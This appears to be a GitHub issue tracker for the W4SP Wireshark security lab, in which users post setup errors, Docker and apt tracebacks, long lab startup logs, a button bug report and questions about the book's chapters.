['docker', 'ps', '-aq', '--filter', 'label=w4sp=true']
Cannot connect to the Docker daemon at unix:///var/run/docker.sock. Is the docker daemon running?
Traceback (most recent call last):
  File "w4sp_webapp.py", line 163, in setup
    w4sp.setup_network2('eth0')
  File "/root/Downloads/w4sp-lab-master/w4sp.py", line 39, in setup_network2
    docker_clean()
  File "/root/Downloads/w4sp-lab-master/w4sp_app/utils.py", line 114, in docker_clean
    out = r('docker ps -aq --filter label=w4sp=true').split('\n')[:-1]
  File "/root/Downloads/w4sp-lab-master/w4sp_app/utils.py", line 83, in r
    return subprocess.check_output(cmd)
  File "/usr/lib/python2.7/subprocess.py", line 219, in check_output
    raise CalledProcessError(retcode, cmd, output=output)
CalledProcessError: Command '['docker', 'ps', '-aq', '--filter', 'label=w4sp=true']' returned non-zero exit status 1

127.0.0.1 - - [26/Sep/2017 11:05:18] "GET /setup HTTP/1.1" 200 -
{'nodes': [{'color': 'rgb(204,0,0)', 'title': u'eth0 : 192.168.1.119 <br>', 'id': 1, 'label': ' kali '}], 'edges': []}
127.0.0.1 - - [26/Sep/2017 11:05:18] "GET /getnet HTTP/1.1" 200 -
127.0.0.1 - - [26/Sep/2017 11:05:18] "GET /is_ips HTTP/1.1" 404 -

Error Starting Lab

The Lab was working fine after initial setup in Chapter 2, but when I went to use it again in Chapter 5, I get the error below.

DETAILS: When I booted the VM, I was prompted to update VirtualBox, so I did. Since then, I've also run the Kali update as per the setup instructions on this site [sudo apt-get update && sudo apt-get dist-upgrade]. But I'm still getting the same error.

The syntax of the failing command seems OK to me. I have no problem manually downloading and opening the public key file [https://packages.elastic.co/GPG-KEY-elasticsearch] in the text editor. In fact, I can manually run the entire command without error.

w4sp-lab@W4SP:~/Downloads/w4sp-lab-master$ sudo python w4sp_webapp.py
['which', 'dumpcap']
['getcap', '/usr/bin/dumpcap']
[*] Caps set correctly on dumpcap
[*] Not enough w4sp/labs images found, building now
/home/w4sp-lab/Downloads/w4sp-lab-master/images
['docker', 'build', '-t', 'w4sp/labs:base', 'base']
['docker', 'build', '-t', 'w4sp/labs:elk', 'elk']
The command '/bin/sh -c wget -qO - https://packages.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -' returned a non-zero code: 2
Traceback (most recent call last):
File "w4sp_webapp.py", line 499, in <module>
w4sp.docker_build('images/')
File "/home/w4sp-lab/Downloads/w4sp-lab-master/w4sp_app/utils.py", line 102, in docker_build
r('docker build -t $image_name $image')
File "/home/w4sp-lab/Downloads/w4sp-lab-master/w4sp_app/utils.py", line 83, in r
return subprocess.check_output(cmd)
File "/usr/lib/python2.7/subprocess.py", line 219, in check_output
raise CalledProcessError(retcode, cmd, output=output)
subprocess.CalledProcessError: Command '['docker', 'build', '-t', 'w4sp/labs:elk', 'elk']' returned non-zero exit status 2

Python script is asking me to run it in root

Hi team,

As per the lab manual, the Python script should run as the w4sp-lab user. But in my case it is asking me to run the script as root.

Please update me on how I can proceed further.

Failed to start docker.service

w4sp-lab@kali:/root/Downloads/w4sp-lab-master$ sudo python w4sp_webapp.py
['which', 'dumpcap']
['getcap', '/usr/bin/dumpcap']
[*] Caps set correctly on dumpcap
Get:1 https://apt.dockerproject.org/repo debian-stretch InRelease [48.7 kB]
Err:1 https://apt.dockerproject.org/repo debian-stretch InRelease
The following signatures couldn't be verified because the public key is not available: NO_PUBKEY F76221572C52609D
Hit:2 http://mirrors.neusoft.edu.cn/kali kali-rolling InRelease
Reading package lists... Done
W: GPG error: https://apt.dockerproject.org/repo debian-stretch InRelease: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY F76221572C52609D
E: The repository 'https://apt.dockerproject.org/repo debian-stretch InRelease' is not signed.
N: Updating from such a repository can't be done securely, and is therefore disabled by default.
N: See apt-secure(8) manpage for repository creation and user configuration details.
Reading package lists... Done
Building dependency tree
Reading state information... Done
apt-transport-https is already the newest version (1.5~rc4).
bridge-utils is already the newest version (1.5-14).
ca-certificates is already the newest version (20170717).
software-properties-common is already the newest version (0.96.20.2-1).
0 upgraded, 0 newly installed, 0 to remove and 1411 not upgraded.
Get:1 https://apt.dockerproject.org/repo debian-stretch InRelease [48.7 kB]
Err:1 https://apt.dockerproject.org/repo debian-stretch InRelease
The following signatures couldn't be verified because the public key is not available: NO_PUBKEY F76221572C52609D
Hit:2 http://mirrors.neusoft.edu.cn/kali kali-rolling InRelease
Reading package lists... Done
W: GPG error: https://apt.dockerproject.org/repo debian-stretch InRelease: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY F76221572C52609D
E: The repository 'https://apt.dockerproject.org/repo debian-stretch InRelease' is not signed.
N: Updating from such a repository can't be done securely, and is therefore disabled by default.
N: See apt-secure(8) manpage for repository creation and user configuration details.
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following additional packages will be installed:
aufs-dkms aufs-tools cgroupfs-mount dkms linux-compiler-gcc-6-x86 linux-headers-4.12.0-kali2-amd64
linux-headers-4.12.0-kali2-common linux-headers-amd64 linux-kbuild-4.12
Suggested packages:
aufs-dev python3-apport
The following NEW packages will be installed:
aufs-dkms aufs-tools cgroupfs-mount dkms docker-engine linux-compiler-gcc-6-x86
linux-headers-4.12.0-kali2-amd64 linux-headers-4.12.0-kali2-common linux-headers-amd64 linux-kbuild-4.12
0 upgraded, 10 newly installed, 0 to remove and 1411 not upgraded.
Need to get 31.4 MB of archives.
After this operation, 165 MB of additional disk space will be used.
WARNING: The following packages cannot be authenticated!
docker-engine
E: There were unauthenticated packages and -y was used without --allow-unauthenticated
Failed to start docker.service: Unit docker.service not found.
Traceback (most recent call last):
File "w4sp_webapp.py", line 480, in <module>
images = subprocess.check_output(['docker', 'images']).split('\n')
File "/usr/lib/python2.7/subprocess.py", line 212, in check_output
process = Popen(stdout=PIPE, *popenargs, **kwargs)
File "/usr/lib/python2.7/subprocess.py", line 390, in __init__
errread, errwrite)
File "/usr/lib/python2.7/subprocess.py", line 1024, in _execute_child
raise child_exception
OSError: [Errno 2] No such file or directory
w4sp-lab@kali:/root/Downloads/w4sp-lab-master$

'Start sploit' button not reset after using 'Shutdown' Button

Steps to recreate

  • start labs using command line
  • click 'Setup' button
  • click 'Start sploit' (to do the labs in Ch6)
  • click 'Shutdown'
  • click 'Setup'

Expected Results

  • 'Start sploit' button is enabled

Actual Results

  • 'Start sploit' button is disabled (and was disabled when it was originally clicked)

Workarounds

  1. Using the dev tools for the browser, you can use the 'pick an element from the page' icon to click on the button and then remove the 'disable=""' entry to re-enable the button on the screen.
  2. shut down the browser, stop the lab from the terminal using [ctrl]-[c] and restart the lab.

Notes

  • This is not a critical bug, only a slight annoyance :)

Issues Setting Up Lab

Running Kali Linux on my Mac through VirtualBox and installing the lab for a college class. Been beating my head off the wall all week trying to get past the different errors I encounter. I can open the browser and try to setup the lab manually by entering the IP address into firefox but it never goes anywhere.

Clarifications on the book text

I'm reading through the book and have found a couple points where I wasn't clear. I'm adding in my assumptions, so any confirmation or correction of these would be appreciated. (BTW, I'm super-stoked about these lab exercises :) )

Ch4. p122 "To show only the NT Create commands, you can use the smb.cmd filter."

One difficulty I have is determining the specific filter to use based on the specific information I see in
wireshark. If you have an smb sample and you look at an smb packet with the NT Create command,
there is nothing in wireshark that gives you a direct mapping to say 'use the smb.cmd filter'.
One tip is that if you right-click on the smb part of the packet, you'll see 'Filter Field Reference'.
Selecting that will bring up a browser window showing you all the fields for that protocol to add to
your filter. It's not a direct mapping, but it does narrow down the search a bit.

Ch5. p132. "To demonstrate ARP in use, let's ping a host on the network..."

You'll want to double-click the 'inet' node from the browser showing the network diagram before
doing this work. This will bring up a terminal window to the right source host and wireshark to
capture the traffic.

I'll post other things that I've run across here as I find them. Any comments on whether my assumptions are correct would be appreciated. :) (Did I mention I love these labs? 👍 )

Chapter 7: Decrypting SSL/TLS

Hi, I'm on Chapter 7. In this section, I want a connection to ftp1 with TLSv2. I start Wireshark, but I only see a connection with TLSv1.

What is my mistake?

Lab Never Starts

I've installed the w4sp lab, and while the lab page comes up, after clicking setup nothing happens, even after several hours.
Any suggestions on how to fix the issue?
sudo python w4sp_webapp.py
['which', 'dumpcap']
['getcap', '/usr/bin/dumpcap']
[*] Caps set correctly on dumpcap
Cannot connect to the Docker daemon at unix:///var/run/docker.sock. Is the docker daemon running?
[*] Not enough w4sp/labs images found, building now
/root/Downloads/w4sp-lab-master/images
['docker', 'build', '-t', 'w4sp/labs:base', 'base']
['docker', 'build', '-t', 'w4sp/labs:switch', 'switch']
['docker', 'build', '-t', 'w4sp/labs:vrrpd', 'vrrpd']
['docker', 'build', '-t', 'w4sp/labs:temp', 'temp']
['docker', 'build', '-t', 'w4sp/labs:inet', 'inet']
['docker', 'build', '-t', 'w4sp/labs:elk', 'elk']
['docker', 'build', '-t', 'w4sp/labs:victims', 'victims']
['docker', 'build', '-t', 'w4sp/labs:wireless', 'wireless']
['docker', 'build', '-t', 'w4sp/labs:ftp_tel', 'ftp_tel']
['docker', 'build', '-t', 'w4sp/labs:samba', 'samba']
['docker', 'ps', '-aq', '--filter', 'label=w4sp=true']
['ifconfig', '-a']
['ip', 'link', 'delete', 'docker0:']
['ip', 'link', 'delete', 'eth0:']
RTNETLINK answers: Operation not supported
['ip', 'link', 'delete', 'lo:']
RTNETLINK answers: Operation not supported
['ip', 'netns']
['pkill', 'dhclient']
['ifconfig', '-a']
['service', 'network-manager', 'start']
['service', 'networking', 'restart']
['service', 'docker', 'restart']

     * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)
    [*] Lab Launched, Starting Browser
    [*] Do not close this terminal. Closing Terminal will terminate lab.
    127.0.0.1 - - [19/Jul/2017 23:21:51] "GET / HTTP/1.1" 200 -
    {'nodes': [{'color': 'rgb(204,0,0)', 'title': u'eth0 : 10.0.2.15
    docker0 : 172.17.0.1
    ', 'id': 1, 'label': ' kali '}], 'edges': []}
    127.0.0.1 - - [19/Jul/2017 23:21:54] "GET /getnet HTTP/1.1" 200 -
    127.0.0.1 - - [19/Jul/2017 23:21:54] "GET /is_ips HTTP/1.1" 404 -
    127.0.0.1 - - [19/Jul/2017 23:21:54] "GET /favicon.ico HTTP/1.1" 404 -
    ['docker', 'ps', '-aq', '--filter', 'label=w4sp=true']
    ['ifconfig', '-a']
    ['ip', 'link', 'delete', 'docker0:']
    ['ip', 'link', 'delete', 'eth0:']
    RTNETLINK answers: Operation not supported
    ['ip', 'link', 'delete', 'lo:']
    RTNETLINK answers: Operation not supported
    ['ip', 'netns']
    ['pkill', 'dhclient']
    ['ifconfig', '-a']
    ['service', 'network-manager', 'start']
    ['service', 'networking', 'restart']
    ['service', 'docker', 'restart']
    ['docker', 'ps', '-aq', '--filter', 'label=w4sp=true']
    ['ifconfig', '-a']
    ['ip', 'link', 'delete', 'docker0:']
    ['ip', 'link', 'delete', 'eth0:']
    RTNETLINK answers: Operation not supported
    ['ip', 'link', 'delete', 'lo:']
    RTNETLINK answers: Operation not supported
    ['ip', 'netns']
    ['pkill', 'dhclient']
    ['ifconfig', '-a']
    ['service', 'network-manager', 'start']
    ['service', 'networking', 'restart']
    ['service', 'docker', 'restart']
    ['docker', 'run', '-id', '--privileged', '--name', 'sw1', '--hostname', 'sw1', '--net=none', 'w4sp/labs:switch']
    ['docker', 'inspect', '-f', "'{{.State.Pid}}'", '9a33d582bab8a05d123c4cbe3e8a9728ab86140c13c05a79c413a94a69c4a178']
    ['ln', '-s', '/proc/10655/ns/net', '/var/run/netns/sw1']
    ['docker', 'run', '-id', '--privileged', '--name', 'r1', '--hostname', 'r1', '--net=none', 'w4sp/labs:vrrpd']
    ['docker', 'inspect', '-f', "'{{.State.Pid}}'", 'c460e1dfc9641d14951a65b13b67d64204a2427bee39804d606066b84ad97653']
    ['ln', '-s', '/proc/10706/ns/net', '/var/run/netns/r1']
    ['docker', 'run', '-id', '--privileged', '--name', 'r2', '--hostname', 'r2', '--net=none', 'w4sp/labs:vrrpd']
    ['docker', 'inspect', '-f', "'{{.State.Pid}}'", 'a82b0f11e06bff349afdba12185e383d29e2b1395b1b570ae392ac42eef5b154']
    ['ln', '-s', '/proc/10768/ns/net', '/var/run/netns/r2']
    ['docker', 'run', '-id', '--privileged', '--name', 'vic1', '--hostname', 'vic1', '--net=none', 'w4sp/labs:victims']
    ['docker', 'inspect', '-f', "'{{.State.Pid}}'", '0772076c6b246f10222ea6b3fb08010c682f6e7a655ebd6ced26a372004a2335']
    ['ln', '-s', '/proc/10858/ns/net', '/var/run/netns/vic1']
    ['docker', 'run', '-id', '--privileged', '--name', 'smb1', '--hostname', 'smb1', '--net=none', 'w4sp/labs:samba']
    ['docker', 'inspect', '-f', "'{{.State.Pid}}'", 'a101c024b047315ff762eb09c79bdf7821c60ac15cc730569cfd743f9c3d1d47']
    ['ln', '-s', '/proc/10978/ns/net', '/var/run/netns/smb1']
    ['docker', 'run', '-id', '--privileged', '--name', 'ftp1', '--hostname', 'ftp1', '--net=none', 'w4sp/labs:ftp_tel']
    ['docker', 'inspect', '-f', "'{{.State.Pid}}'", '04374fe3fe223e39aa6d31249f2cb966aef8078075ca7e77a3d1f4126148de23']
    ['ln', '-s', '/proc/11075/ns/net', '/var/run/netns/ftp1']
    ['ip', 'link', 'add', 'r1_0', 'type', 'veth', 'peer', 'name', 'tmp']
    ['ip', 'link', 'set', 'tmp', 'netns', '10655']
    ['ip', 'link', 'set', 'r1_0', 'netns', '10706']
    ['ip', 'netns', 'exec', 'sw1', 'ethtool', '-K', 'tmp', 'rx', 'off', 'tx', 'off']
    ['ip', 'link', 'set', 'dev', 'tmp', 'name', 'r1_0']
    ['ethtool', '-K', 'r1_0', 'rx', 'off', 'tx', 'off']
    ['ip', 'link', 'add', 'r2_0', 'type', 'veth', 'peer', 'name', 'tmp']
    ['ip', 'link', 'set', 'tmp', 'netns', '10655']
    ['ip', 'link', 'set', 'r2_0', 'netns', '10768']
    ['ip', 'netns', 'exec', 'sw1', 'ethtool', '-K', 'tmp', 'rx', 'off', 'tx', 'off']
    ['ip', 'link', 'set', 'dev', 'tmp', 'name', 'r2_0']
    ['ethtool', '-K', 'r2_0', 'rx', 'off', 'tx', 'off']
    ['ip', 'link', 'add', 'vic1_0', 'type', 'veth', 'peer', 'name', 'tmp']
    ['ip', 'link', 'set', 'tmp', 'netns', '10655']
    ['ip', 'link', 'set', 'vic1_0', 'netns', '10858']
    ['ip', 'netns', 'exec', 'sw1', 'ethtool', '-K', 'tmp', 'rx', 'off', 'tx', 'off']
    ['ip', 'link', 'set', 'dev', 'tmp', 'name', 'vic1_0']
    ['ethtool', '-K', 'vic1_0', 'rx', 'off', 'tx', 'off']
    ['ip', 'link', 'add', 'smb1_0', 'type', 'veth', 'peer', 'name', 'tmp']
    ['ip', 'link', 'set', 'tmp', 'netns', '10655']
    ['ip', 'link', 'set', 'smb1_0', 'netns', '10978']
    ['ip', 'netns', 'exec', 'sw1', 'ethtool', '-K', 'tmp', 'rx', 'off', 'tx', 'off']
    ['ip', 'link', 'set', 'dev', 'tmp', 'name', 'smb1_0']
    ['ethtool', '-K', 'smb1_0', 'rx', 'off', 'tx', 'off']
    ['ip', 'link', 'add', 'ftp1_0', 'type', 'veth', 'peer', 'name', 'tmp']
    ['ip', 'link', 'set', 'tmp', 'netns', '10655']
    ['ip', 'link', 'set', 'ftp1_0', 'netns', '11075']
    ['ip', 'netns', 'exec', 'sw1', 'ethtool', '-K', 'tmp', 'rx', 'off', 'tx', 'off']
    ['ip', 'link', 'set', 'dev', 'tmp', 'name', 'ftp1_0']
    ['ethtool', '-K', 'ftp1_0', 'rx', 'off', 'tx', 'off']
    ['ip', 'addr', 'add', '192.100.200.96/24', 'dev', 'br0']
    ['docker', 'run', '-id', '--privileged', '--name', 'sw2', '--hostname', 'sw2', '--net=none', 'w4sp/labs:switch']
    ['docker', 'inspect', '-f', "'{{.State.Pid}}'", '31866dbdd834d959a71a79aa244e5a4806e626ade8d228178ee2befc6912a641']
    ['ln', '-s', '/proc/11513/ns/net', '/var/run/netns/sw2']
    ['docker', 'run', '-id', '--privileged', '--name', 'inet', '--hostname', 'inet', '--net=none', 'w4sp/labs:inet']
    ['docker', 'inspect', '-f', "'{{.State.Pid}}'", '3066a3edd941e6218bf1c7221755c97bbc1d9f5a95d5f728b9ea08b477aa9643']
    ['ln', '-s', '/proc/11628/ns/net', '/var/run/netns/inet']
    ['docker', 'run', '-id', '--privileged', '--name', 'vic4', '--hostname', 'vic4', '--net=none', 'w4sp/labs:victims']
    ['docker', 'inspect', '-f', "'{{.State.Pid}}'", '50171cba66913f4c3415ad1104ea336af35ef6d409d29d4d64988eb9dcede514']
    ['ln', '-s', '/proc/11722/ns/net', '/var/run/netns/vic4']
    ['docker', 'run', '-id', '--privileged', '--name', 'smb2', '--hostname', 'smb2', '--net=none', 'w4sp/labs:samba']
    ['docker', 'inspect', '-f', "'{{.State.Pid}}'", '446b47e3965d17777e270b0a12d55604d402f8d9f83ac10f80f8b09498cf394b']
    ['ln', '-s', '/proc/11808/ns/net', '/var/run/netns/smb2']
    ['docker', 'run', '-id', '--privileged', '--name', 'ftp2', '--hostname', 'ftp2', '--net=none', 'w4sp/labs:ftp_tel']
    ['docker', 'inspect', '-f', "'{{.State.Pid}}'", 'd77cc79350b1a9293489446d5358d5682726adf43d103a6eec41692e4443a870']
    ['ln', '-s', '/proc/11898/ns/net', '/var/run/netns/ftp2']
    ['ip', 'link', 'add', 'r1_1', 'type', 'veth', 'peer', 'name', 'tmp']
    ['ip', 'link', 'set', 'tmp', 'netns', '11513']
    ['ip', 'link', 'set', 'r1_1', 'netns', '10706']
    ['ip', 'netns', 'exec', 'sw2', 'ethtool', '-K', 'tmp', 'rx', 'off', 'tx', 'off']
    ['ip', 'link', 'set', 'dev', 'tmp', 'name', 'r1_1']
    ['ethtool', '-K', 'r1_1', 'rx', 'off', 'tx', 'off']
    ['ip', 'link', 'add', 'r2_1', 'type', 'veth', 'peer', 'name', 'tmp']
    ['ip', 'link', 'set', 'tmp', 'netns', '11513']
    ['ip', 'link', 'set', 'r2_1', 'netns', '10768']
    ['ip', 'netns', 'exec', 'sw2', 'ethtool', '-K', 'tmp', 'rx', 'off', 'tx', 'off']
    ['ip', 'link', 'set', 'dev', 'tmp', 'name', 'r2_1']
    ['ethtool', '-K', 'r2_1', 'rx', 'off', 'tx', 'off']
    ['ip', 'link', 'add', 'inet_0', 'type', 'veth', 'peer', 'name', 'tmp']
    ['ip', 'link', 'set', 'tmp', 'netns', '11513']
    ['ip', 'link', 'set', 'inet_0', 'netns', '11628']
    ['ip', 'netns', 'exec', 'sw2', 'ethtool', '-K', 'tmp', 'rx', 'off', 'tx', 'off']
    ['ip', 'link', 'set', 'dev', 'tmp', 'name', 'inet_0']
    ['ethtool', '-K', 'inet_0', 'rx', 'off', 'tx', 'off']
    ['ip', 'link', 'add', 'vic4_0', 'type', 'veth', 'peer', 'name', 'tmp']
    ['ip', 'link', 'set', 'tmp', 'netns', '11513']
    ['ip', 'link', 'set', 'vic4_0', 'netns', '11722']
    ['ip', 'netns', 'exec', 'sw2', 'ethtool', '-K', 'tmp', 'rx', 'off', 'tx', 'off']
    ['ip', 'link', 'set', 'dev', 'tmp', 'name', 'vic4_0']
    ['ethtool', '-K', 'vic4_0', 'rx', 'off', 'tx', 'off']
    ['ip', 'link', 'add', 'smb2_0', 'type', 'veth', 'peer', 'name', 'tmp']
    ['ip', 'link', 'set', 'tmp', 'netns', '11513']
    ['ip', 'link', 'set', 'smb2_0', 'netns', '11808']
    ['ip', 'netns', 'exec', 'sw2', 'ethtool', '-K', 'tmp', 'rx', 'off', 'tx', 'off']
    ['ip', 'link', 'set', 'dev', 'tmp', 'name', 'smb2_0']
    ['ethtool', '-K', 'smb2_0', 'rx', 'off', 'tx', 'off']
    ['ip', 'link', 'add', 'ftp2_0', 'type', 'veth', 'peer', 'name', 'tmp']
    ['ip', 'link', 'set', 'tmp', 'netns', '11513']
    ['ip', 'link', 'set', 'ftp2_0', 'netns', '11898']
    ['ip', 'netns', 'exec', 'sw2', 'ethtool', '-K', 'tmp', 'rx', 'off', 'tx', 'off']
    ['ip', 'link', 'set', 'dev', 'tmp', 'name', 'ftp2_0']
    ['ethtool', '-K', 'ftp2_0', 'rx', 'off', 'tx', 'off']
    ['ip', 'addr', 'add', '10.100.200.65/24', 'dev', 'br0']
    ['ip', 'link', 'set', 'eth0', 'down']
    ['ip', 'link', 'set', 'eth0', 'name', 'root']
    ['ip', 'link', 'set', 'root', 'netns', 'inet']
    ['ip', 'link', 'add', 'root_0', 'type', 'veth', 'peer', 'name', 'tmp']
    ['ip', 'link', 'set', 'tmp', 'netns', '10655']
    ['ip', 'link', 'set', 'root_0', 'netns', '1']
    ['ip', 'netns', 'exec', 'sw1', 'ethtool', '-K', 'tmp', 'rx', 'off', 'tx', 'off']
    ['ip', 'link', 'set', 'dev', 'tmp', 'name', 'root_0']
    ['ethtool', '-K', 'root_0', 'rx', 'off', 'tx', 'off']
    ['brctl', 'addif', 'br0', 'root_0']
    ['ip', 'link', 'set', 'root_0', 'up']
    ['service', 'network-manager', 'stop']
    ['ip', 'link', 'set', 'root_0', 'name', 'w4sp_lab']
    ['dhclient', '-v', 'w4sp_lab']
    Internet Systems Consortium DHCP Client 4.3.5
    Copyright 2004-2016 Internet Systems Consortium.
    All rights reserved.
    For info, please visit https://www.isc.org/software/dhcp/
    Listening on LPF/w4sp_lab/e2:7d:a6:24:8f:39
    Sending on LPF/w4sp_lab/e2:7d:a6:24:8f:39
    Sending on Socket/fallback
    DHCPDISCOVER on w4sp_lab to 255.255.255.255 port 67 interval 7
    DHCPREQUEST of 192.100.200.113 on w4sp_lab to 255.255.255.255 port 67
    DHCPOFFER of 192.100.200.113 from 192.100.200.96
    DHCPACK of 192.100.200.113 from 192.100.200.96
    smbd.service is not active, cannot reload.
    invoke-rc.d: initscript smbd, action "reload" failed.
    bound to 192.100.200.113 -- renewal in 1360 seconds.
    ['route', 'add', '-net', '192.100.200.0', 'netmask', '255.255.255.0', 'gw', '10.100.200.1']
    127.0.0.1 - - [19/Jul/2017 23:27:02] "GET /setup HTTP/1.1" 200 -

Exception happened during processing of request from ('127.0.0.1', 40158)
Traceback (most recent call last):
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock
self.process_request(request, client_address)
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request
self.finish_request(request, client_address)
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/usr/lib/python2.7/SocketServer.py", line 654, in __init__
self.finish()
File "/usr/lib/python2.7/SocketServer.py", line 713, in finish
self.wfile.close()
File "/usr/lib/python2.7/socket.py", line 283, in close
self.flush()
File "/usr/lib/python2.7/socket.py", line 307, in flush
self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe

10655 connected 10706
10655 connected 10768
10655 connected 10858
10655 connected 10978
10655 connected 11075
10706 connected 11513
10768 connected 11513
11513 connected 11628
11513 connected 11722
11513 connected 11808
11513 connected 11898
{'nodes': [{'title': u'br0 : 192.100.200.96
', 'id': '10655', 'label': 'sw1'}, {'title': u'r1_0 : 192.100.200.58
', 'id': '10706', 'label': 'r1'}, {'title': u'r2_0 : 192.100.200.72
', 'id': '10768', 'label': 'r2'}, {'title': u'vic1_0 : 192.100.200.149
', 'id': '10858', 'label': 'vic1'}, {'title': u'smb1_0 : 192.100.200.178
', 'id': '10978', 'label': 'smb1'}, {'title': u'ftp1_0 : 192.100.200.145
', 'id': '11075', 'label': 'ftp1'}, {'title': u'br0 : 10.100.200.65
', 'id': '11513', 'label': 'sw2'}, {'color': 'rgb(0,255,0)', 'title': u'root : 10.0.2.15
inet_0 : 10.100.200.61
', 'id': '11628', 'label': 'inet'}, {'title': u'vic4_0 : 10.100.200.123
', 'id': '11722', 'label': 'vic4'}, {'title': u'smb2_0 : 10.100.200.161
', 'id': '11808', 'label': 'smb2'}, {'title': u'ftp2_0 : 10.100.200.164
', 'id': '11898', 'label': 'ftp2'}, {'color': 'rgb(204,0,0)', 'title': u'docker0 : 172.17.0.1
w4sp_lab : 192.100.200.113
', 'id': 1, 'label': ' kali '}], 'edges': [{'to': '10706', 'from': '10655'}, {'to': '10768', 'from': '10655'}, {'to': '10858', 'from': '10655'}, {'to': '10978', 'from': '10655'}, {'to': '11075', 'from': '10655'}, {'to': '10655', 'from': 1}, {'to': '11513', 'from': '10706'}, {'to': '11513', 'from': '10768'}, {'to': '11628', 'from': '11513'}, {'to': '11722', 'from': '11513'}, {'to': '11808', 'from': '11513'}, {'to': '11898', 'from': '11513'}]}
127.0.0.1 - - [19/Jul/2017 23:27:02] "GET /getnet HTTP/1.1" 200 -

Exception happened during processing of request from ('127.0.0.1', 40160)
Traceback (most recent call last):
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock
self.process_request(request, client_address)
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request
self.finish_request(request, client_address)
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/usr/lib/python2.7/SocketServer.py", line 654, in __init__
self.finish()
File "/usr/lib/python2.7/SocketServer.py", line 713, in finish
self.wfile.close()
File "/usr/lib/python2.7/socket.py", line 283, in close
self.flush()
File "/usr/lib/python2.7/socket.py", line 307, in flush
self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe

^C
Session terminated, terminating shell...Traceback (most recent call last):
File "w4sp_webapp.py", line 530, in <module>
subprocess.call(['su', '-', 'w4sp-lab', '-c', 'firefox 127.0.0.1:5000'])
File "/usr/lib/python2.7/subprocess.py", line 168, in call
return Popen(*popenargs, **kwargs).wait()
File "/usr/lib/python2.7/subprocess.py", line 1073, in wait
pid, sts = _eintr_retry_call(os.waitpid, self.pid, 0)
File "/usr/lib/python2.7/subprocess.py", line 121, in _eintr_retry_call
return func(*args)
KeyboardInterrupt
###!!! [Child][MessageChannel] Error: (msgtype=0x3E0003,name=PCompositable::Msg_Destroy) Channel error: cannot send/recv
###!!! [Child][MessageChannel] Error: (msgtype=0x3E0003,name=PCompositable::Msg_Destroy) Channel error: cannot send/recv
###!!! [Child][MessageChannel] Error: (msgtype=0xE20003,name=PTexture::Msg_Destroy) Channel error: cannot send/recv
###!!! [Child][MessageChannel] Error: (msgtype=0xE20003,name=PTexture::Msg_Destroy) Channel error: cannot send/recv
###!!! [Child][MessageChannel] Error: (msgtype=0x3E0003,name=PCompositable::Msg_Destroy) Channel error: cannot send/recv
###!!! [Child][MessageChannel] Error: (msgtype=0xE20003,name=PTexture::Msg_Destroy) Channel error: cannot send/recv
###!!! [Child][MessageChannel] Error: (msgtype=0xE20003,name=PTexture::Msg_Destroy) Channel error: cannot send/recv
###!!! [Child][MessageChannel] Error: (msgtype=0x3E0003,name=PCompositable::Msg_Destroy) Channel error: cannot send/recv
[GFX1-]: Receive IPC close with reason=AbnormalShutdown
[Child 10015] WARNING: pipe error (3): Connection reset by peer: file /build/firefox-esr-XWSZH3/firefox-esr-52.2.0esr/ipc/chromium/src/chrome/common/ipc_channel_posix.cc, line 322
[Child 10015] ###!!! ABORT: Aborting on channel error.: file /build/firefox-esr-XWSZH3/firefox-esr-52.2.0esr/ipc/glue/MessageChannel.cpp, line 2152
[Child 10015] ###!!! ABORT: Aborting on channel error.: file /build/firefox-esr-XWSZH3/firefox-esr-52.2.0esr/ipc/glue/MessageChannel.cpp, line 2152
w4sp-lab@kali:/root/Downloads/w4sp-lab-master$ ...terminated.

Lua with Graphviz Library

Hello!

When I wanted to run the wireviz.lua script to make a graph, I got an error message: gv.lua cannot be found.

I've installed Graphviz and made some system environment PATH modifications for Graphviz (as the software documentation mentions).

The error message:

c:\Program Files\Wireshark>tshark -q -X lua_script:wireviz.lua -i 9 > TEST.svg
tshark: Lua: Error during loading:
[string "wireviz.lua"]:2: module 'gv' not found:
no field package.preload['gv']
no file '\gv.lua'
no file 'C:\Users\peter\AppData\Roaming\Wireshark\plugins\gv.lua'
no file 'c:\Program Files\Wireshark\plugins\2.2.5\gv.lua'
no file 'C:\Users\peter\AppData\Roaming\Wireshark\plugins\cloudshark\gv.lua'
no file 'C:\Users\peter\AppData\Roaming\Wireshark\plugins\gv.lua'
no file 'c:\Program Files\Wireshark\plugins\2.2.5\gv.lua'
no file 'C:\Users\peter\AppData\Roaming\Wireshark\plugins\cloudshark\gv.lua'
(....)

I've tested it in Linux as well.

Could you give some hints on how I should install Graphviz, or how it should work?

Many thanks for your help,
Peter

Multiple Errors Setting up Lab

/home/w4sp-lab/Downloads/w4sp-lab-master/images
['docker', 'build', '-t', 'w4sp/labs:base', 'base']
['docker', 'build', '-t', 'w4sp/labs:vrrpd', 'vrrpd']
['docker', 'build', '-t', 'w4sp/labs:wireless', 'wireless']
['docker', 'build', '-t', 'w4sp/labs:temp', 'temp']
['docker', 'build', '-t', 'w4sp/labs:switch', 'switch']
^CTraceback (most recent call last):
File "w4sp_webapp.py", line 499, in <module>
w4sp.docker_build('images/')
File "/home/w4sp-lab/Downloads/w4sp-lab-master/w4sp_app/utils.py", line 102, in docker_build
r('docker build -t $image_name $image')
File "/home/w4sp-lab/Downloads/w4sp-lab-master/w4sp_app/utils.py", line 83, in r
return subprocess.check_output(cmd)
File "/usr/lib/python2.7/subprocess.py", line 217, in check_output
output, unused_err = process.communicate()
File "/usr/lib/python2.7/subprocess.py", line 475, in communicate
stdout = _eintr_retry_call(self.stdout.read)
File "/usr/lib/python2.7/subprocess.py", line 125, in _eintr_retry_call
return func(*args)

Failed to start w4sp_webapp.py

